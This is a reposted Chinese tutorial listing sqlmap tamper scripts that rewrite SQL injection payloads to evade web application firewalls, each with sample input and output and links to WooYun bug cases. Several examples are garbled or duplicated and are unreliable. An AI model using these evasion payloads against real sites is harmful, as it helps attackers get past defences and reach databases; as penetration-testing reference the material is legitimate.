使用sqlmap中tamper脚本绕过waf 【转载】

0x00 背景



sqlmap中的tamper脚本来对目标进行更高效的攻击。

由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。

0x01 start


脚本名:apostrophemask.py



作用:用utf8代替引号


1

Example: ("1 AND ‘1‘=‘1") ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871‘

Tested against: all

脚本名:equaltolike.py



作用:like 代替等号


1

2

3

4

5

Example:

*   Input: SELECT * FROM users WHERE id=1

*   Output: SELECT * FROM users WHERE id LIKE 1

案例一: http://wooyun.org/bugs/wooyun-2010-087296

案例二: http://wooyun.org/bugs/wooyun-2010-074790

案例三:http://wooyun.org/bugs/wooyun-2010-072489

脚本名:space2dash.py



作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)


1

Example: (‘1 AND 9227=9227‘) ‘1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227‘

Tested against: * MSSQL * SQLite

案例一:http://wooyun.org/bugs/wooyun-2010-062878

脚本名:greatest.py



作用:绕过过滤’>’ ,用GREATEST替换大于号。


1

Example: (‘1 AND A > B‘) ‘1 AND GREATEST(A,B+1)=A‘ Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

脚本名:space2hash.py



作用:空格替换为#号 随机字符串 以及换行符


1

2

3

4

Example:

*   Input: 1 AND 9227=9227

*   Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

  • MySQL Tested against:
  • MySQL 4.0, 5.0

参考:法克的一篇文章

脚本名:apostrophenullencode.py



作用:绕过过滤双引号,替换字符和双引号。


1

Example: tamper("1 AND ‘1‘=‘1") ‘1 AND %00%271%00%27=%00%271‘

Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:halfversionedmorekeywords.py



作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论


1

2

3

Example:

("value‘ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa‘=‘QDWa") "value‘/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND ‘QDWa‘=‘QDWa"

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

脚本名:space2morehash.py



作用:空格替换为 #号 以及更多随机字符串 换行符


1

2

3

4

5

Example:

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement: * MySQL >= 5.1.13 Tested

against: * MySQL 5.1.41

案例一:91ri一篇文章

脚本名:appendnullbyte.py



作用:在有效负荷结束位置加载零字节字符编码


1

Example: (‘1 AND 1=1‘) ‘1 AND 1=1%00‘

Requirement:

  • Microsoft Access

脚本名:ifnull2ifisnull.py



作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’


1

2

3

Example:

(‘IFNULL(1, 2)‘) ‘IF(ISNULL(1),2,1)‘

Requirement:

  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5

脚本名:space2mssqlblank.py(mssql)



作用:空格替换为其它空符号

Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

ASCII table:



案例一: wooyun.org/bugs/wooyun-2010-062878

脚本名:base64encode.py



作用:用base64编码替换 Example: ("1‘ AND SLEEP(5)#") ‘MScgQU5EIFNMRUVQKDUpIw==‘ Requirement: all

案例一: http://wooyun.org/bugs/wooyun-2010-060071

案例二: http://wooyun.org/bugs/wooyun-2010-021062

案例三: http://wooyun.org/bugs/wooyun-2010-043229

脚本名:space2mssqlhash.py



作用:替换空格


1

Example: (‘1 AND 9227=9227‘) ‘1%23%0AAND%23%0A9227=9227‘ Requirement: * MSSQL * MySQL

脚本名:modsecurityversioned.py



作用:过滤空格,包含完整的查询版本注释


1

Example: (‘1 AND 2>1--‘) ‘1 /*!30874AND 2>1*/--‘

Requirement: * MySQL

Tested against:

  • MySQL 5.0

脚本名:space2mysqlblank.py



作用:空格替换其它空白符号(mysql)


1

2

3

4

5

Example:

* Input: SELECT id FROM users

* Output: SELECT%0Bid%0BFROM%A0users

Requirement:

  • MySQL

Tested against:

  • MySQL 5.1

案例一:wooyun.org/bugs/wooyun-2010-076735

脚本名:between.py



作用:用between替换大于号(>)


1

Example: (‘1 AND A > B--‘) ‘1 AND A NOT BETWEEN 0 AND B--‘

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-068815

脚本名:space2mysqldash.py



作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的


1

Example: (‘1 AND 9227=9227‘) ‘1--%0AAND--%0A9227=9227‘

Requirement:

  • MySQL
  • MSSQL

脚本名:multiplespaces.py



作用:围绕SQL关键字添加多个空格


1

Example: (‘1 UNION SELECT foobar‘) ‘1 UNION SELECT foobar‘

Tested against: all

案例一: wooyun.org/bugs/wooyun-2010-072489

脚本名:space2plus.py



作用:用+替换空格


1

Example: (‘SELECT id FROM users‘) ‘SELECT+id+FROM+users‘ Tested against: all

脚本名:bluecoat.py



作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like


1

Example: (‘SELECT id FROM users where id = 1‘) ‘SELECT%09id FROM users where id LIKE 1‘

Tested against:

  • MySQL 5.1, SGOS

脚本名:nonrecursivereplacement.py



双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters


1

Example: (‘1 UNION SELECT 2--‘) ‘1 UNIOUNIONN SELESELECTCT 2--‘ Tested against: all

脚本名:space2randomblank.py



作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集


1

Example: (‘SELECT id FROM users‘) ‘SELECT%0Did%0DFROM%0Ausers‘

Tested against: all

脚本名:sp_password.py



作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾


1

Example: (‘1 AND 9227=9227-- ‘) ‘1 AND 9227=9227-- sp\_password‘ Requirement: * MSSQL

脚本名:chardoubleencode.py



作用: 双url编码(不处理以编码的)


1

2

3

4

5

Example:

* Input: SELECT FIELD FROM%20TABLE

* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

脚本名:unionalltounion.py



作用:替换UNION ALL SELECT UNION SELECT

Example: (‘-1 UNION ALL SELECT‘) ‘-1 UNION SELECT‘

Requirement: all

脚本名:charencode.py



作用:url编码


1

2

3

4

5

Example:

*   Input: SELECT FIELD FROM%20TABLE

*   Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:randomcase.py



作用:随机大小写 Example:

  • Input: INSERT
  • Output: InsERt

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:unmagicquotes.py



作用:宽字符绕过 GPC addslashes


1

2

3

4

5

Example:

* Input: 1′ AND 1=1

* Output: 1%bf%27 AND 1=1–%20

脚本名:randomcomments.py



作用:用/**/分割sql关键字


1

2

3

Example:

INSERT’ becomes ‘IN//S//ERT’

脚本名:charunicodeencode.py



作用:字符串 unicode 编码


1

2

3

4

5

Example:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

  • ASP
  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3

案例一: wooyun.org/bugs/wooyun-2010-074261

脚本名:securesphere.py



作用:追加特制的字符串


1

Example: (‘1 AND 1=1‘) "1 AND 1=1 and ‘0having‘=‘0having‘"

Tested against: all

脚本名:versionedmorekeywords.py



作用:注释绕过


1

2

3

4

5

Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

  • MySQL >= 5.1.13

脚本名:space2comment.py



作用:Replaces space character (‘ ‘) with comments ‘/**/’


1

2

3

4

5

Example:

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-046496

脚本名:halfversionedmorekeywords.py



作用:关键字前加注释


1

2

3

4

5

Example:

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=‘QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=‘QDWa

时间: 2024-11-04 22:46:14

使用sqlmap中tamper脚本绕过waf 【转载】的相关文章

使用sqlmap中tamper脚本绕过waf

使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习. 根据sqlmap中的tamper脚本可以学习过绕过一些技巧. 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本. 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快. 0x01 start 脚本名:apostrophemask.py 作用:用u

使用sqlmap中的tamper脚本绕过waf

使用sqlmap中tamper脚本绕过waf 脚本名:0x2char.py 作用:用UTF-8全角对应字符替换撇号字符 作用:用等价的CONCAT(CHAR(),...)对应替换每个(MySQL)0x <hex>编码的字符串 测试对象: MySQL 4,5.0和5.5 >>> tamper('SELECT 0xdeadbeef') 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' 脚本名:apostrophema

绕过waf

WAF:有硬件和软件类型. 常见的软WAF,常见:安全狗.云锁.云盾.护卫神. SQL注入的绕过: WAF核心机制就是正则匹配. 通过正则匹配,如果符合规则,就拦截. 比如sql注入中and 1=1被拦截. 可尝试大小写绕过:And 1=1 编码绕过:  因为WAF 获取数据后不会解码.如&=>%26 通过不同进制绕过:例如16进制的0x32相当于十进制的2. 铭记:安全和用户体验都是需要平衡的,特别是针对WAF而言. WAF判断的几种方法: 1.SQLmap 使用SQLmap中自带的WAF

sqlmap注入之tamper绕过WAF脚本列表

本文作者:i春秋作者--玫瑰 QQ2230353371转载请保留文章出处 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用"NOT BETWEEN 0 AND #&q

sqlmap tamper 绕过waf

01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 对给定的payload全部字符使用Base64编码 05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”

sql注入之tamper绕过WAF防火墙

### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过.利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过. 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数中包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id=1空格      测试空格     2,id=1%201=1     测试等号     3,id=1%201=1 select 测试select  

如何使用SQLMAP绕过WAF

WAF(web应用防火墙)逐渐成为安全解决方案的标配之一.正因为有了它,许多公司甚至已经不在意web应用的漏洞.遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs. svn下载最新版本的sqlmap svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 我们关注的重点在于使用tamper脚本修改请求从而逃避WAF的规则检测.许多时候,你需要联合使用多个ta

sqlmap之常用tamper脚本

常用tamper脚本 apostrophemask.py适用数据库:ALL作用:将引号替换为utf-8,用于过滤单引号使用脚本前:tamper("1 AND '1'='1")使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 base64encode.py适用数据库:ALL作用:替换为base64编码使用脚本前:tamper("1' AND SLEEP(5)#")使用脚本后:MScgQU5EIFNMRUVQKDUpIw== mult

sqlmap tamper脚本扩展开发(Bypass IPS)

首先先对比一下两个自带的tamper脚本,看看sqlmap调用tamper有没有依赖什么类库或者算法. 例如调用tamper是导入之后调用脚本里的某函数,那么我们开发的tamper脚本也应该有调用要用到的函数,主要看算法吧,咳咳 先来看看base64encode.py #!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LI